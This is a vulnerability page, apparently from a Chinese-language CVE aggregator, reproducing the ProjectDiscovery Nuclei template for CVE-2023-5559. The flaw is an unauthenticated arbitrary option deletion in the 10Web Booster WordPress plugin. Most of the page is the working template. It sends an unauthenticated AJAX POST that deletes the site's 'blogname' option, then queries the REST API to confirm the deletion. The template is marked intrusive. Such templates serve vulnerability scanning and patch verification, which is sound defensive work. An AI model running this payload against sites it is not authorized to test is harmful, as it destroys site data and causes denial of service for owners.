CVE-2023-5559: 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion

日期: 2025-08-01 | 影响软件: 10Web Booster | POC: 已公开

漏洞描述

The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.

PoC代码[已公开]

id: CVE-2023-5559

info:
  name: 10Web Booster < 2.24.18 - Unauthenticated Arbitrary Option Deletion
  author: daffainfo
  severity: critical
  description: |
    The 10Web Booster WordPress plugin before 2.24.18 does not validate the option name given to some AJAX actions, allowing unauthenticated users to delete arbitrary options from the database, leading to denial of service.
  reference:
    - https://wpscan.com/vulnerability/eba46f7d-e4db-400c-8032-015f21087bbf/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5559
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2023-5559
    epss-score: 0.50245
    epss-percentile: 0.97695
    cpe: cpe:2.3:a:10web:10web_booster:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: 10web
    product: 10web_booster
    framework: wordpress
    publicwww-query: "/wp-content/plugins/tenweb-speed-optimizer"
  tags: cve,cve2023,wordpress,wp-plugin,wp,10web,vkev,intrusive,vuln

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json"
        - "?rest_route=/"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "{\"name\":\"", "\"description\":")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=two_activate_score_check&nonce=blogname

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/{{route}}"

    attack: clusterbomb
    payloads:
      route:
        - "wp-json"
        - "?rest_route=/"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"name\":false")'
        condition: and
# digest: 4a0a0047304502206b25ac91925c600120e767762a6eb5a4201762971d57eacadc461903f1eb6e8502210087283974a889592d5fde2c85f27838dc0ad06cddaa96aa3795bef10bf9e81449:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-5559.yaml